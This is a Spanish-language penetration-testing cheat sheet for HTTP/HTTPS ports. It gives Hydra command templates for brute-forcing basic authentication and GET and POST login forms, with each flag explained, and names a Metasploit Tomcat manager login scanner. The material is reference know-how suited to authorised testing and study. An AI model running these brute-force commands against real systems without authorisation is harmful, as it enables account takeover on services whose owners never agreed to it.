80/TCP, 443/TCP (HTTP/S)

HTTP, Hypertext Transfer Protocol. HTTPS, Hypertext Transfer Protocol Secure.

Hydra

Basic HTTP Authentication

hydra -C <path-wordlist> <target> http-get / -f -V

  • -C = formato "user:pass".

    • <path-wordlist> = ruta de wordlist.

  • <target> = objetivo.

  • http-get = método HTTP GET.

  • -f = salir cuando se encuentra un par de usuario/contraseña correctos.

  • -V = modo verboso.

Método HTTP GET

hydra -L <path-users> -P <path-passwords> <target> http-get-form "/login.php:username=^USER^&password=^PASS^:<incorrect-reply-message>" -f -V

  • -L = utilizar archivo de usuarios.

    • <path-users> = ruta de archivo con listado de usuarios.

  • -P = utilizar archivo de contraseñas.

    • <path-passwords> = ruta de archivo con listado de contraseñas.

  • <target> = objetivo.

  • http-get-form = método HTTP GET.

  • <incorrect-reply-message> = mensaje de respuesta incorrecto.

  • -f = salir cuando se encuentra un par de usuario/contraseña correctos.

  • -V = modo verboso.

Método HTTP POST

hydra -L <path-users> -P <path-passwords> <target> http-post-form "/login.php:username=^USER^&password=^PASS^:<incorrect-reply-message>" -f -V

  • -L = utilizar archivo de usuarios.

    • <path-users> = ruta de archivo con listado de usuarios.

  • -P = utilizar archivo de contraseñas.

    • <path-passwords> = ruta de archivo con listado de contraseñas.

  • <target> = objetivo.

  • http-post-form = método HTTP POST.

  • <incorrect-reply-message> = mensaje de respuesta incorrecto.

  • -f = salir cuando se encuentra un par de usuario/contraseña correctos.

  • -V = modo verboso.

Metasploit

Apache Tomcat

auxiliary/scanner/http/tomcat_mgr_login
Anterior23/TCP (Telnet)Siguiente161/UDP, 162/UDP (SNMP)

Última actualización